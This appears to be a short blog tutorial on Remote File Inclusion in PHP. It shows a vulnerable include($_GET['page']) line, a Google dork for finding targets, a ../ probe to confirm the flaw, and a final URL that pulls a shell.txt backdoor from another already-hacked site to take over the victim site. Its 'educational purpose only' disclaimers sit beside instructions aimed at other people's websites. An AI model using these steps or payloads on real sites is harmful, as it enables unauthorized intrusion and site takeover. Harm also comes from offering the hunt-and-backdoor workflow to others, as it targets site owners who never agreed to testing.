Remote File Inclusion (RFI) is a type
of vulnerability some websites.
It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to
the use of user-supplied input without proper validation. This can lead
to Code execution on the web server.
The main cause
is due to the use of unvalidated external variables , Most
notable is the include statement.
The vuln. Code looks like:
<?php
include($_GET['page']);
?>
To attack you do is search for site:
Example using google dork inurl:php?page= or some
kind of the url should be like:
www.site.com/somefile.php?page=www.somesite.com
well we wont find RFI vuln sites these days you
may find 1 or 2 in a million or maybe not.this is for educational purpose only.but
I will be explaining you with screenshots.
Step1:find the vuln site.
Then place ../ at the end of url (remove the
content in page=) like this
Ex:www.site.com/somefile.php?page=../
If it shows some kind of error like ::
Warning: file(../) [function.file]:
failed to open stream: Permission denied in\\systemname\users\ in
line.
Then it is vuln to RFI.
Sometimes if you are lucky directly check with
inserting the other url .
Ex:www.site.com/file.php?page=www.google.com
Tats it now to take over this site all u need is
a SHELL. A shell is like a unauthorized
backdoor control panel of website.and it should be in the .txt extension
(* im not responsible for any of your actions
, for education purpose only.*)
Now put in the url like :: www.site.com/file.php?id=http://www.site.com/shell.txt
This shell.txt comes from other site which u have
already hacked and uploaded the txt file.
You will find like this :::tada !
0 comments:
Post a Comment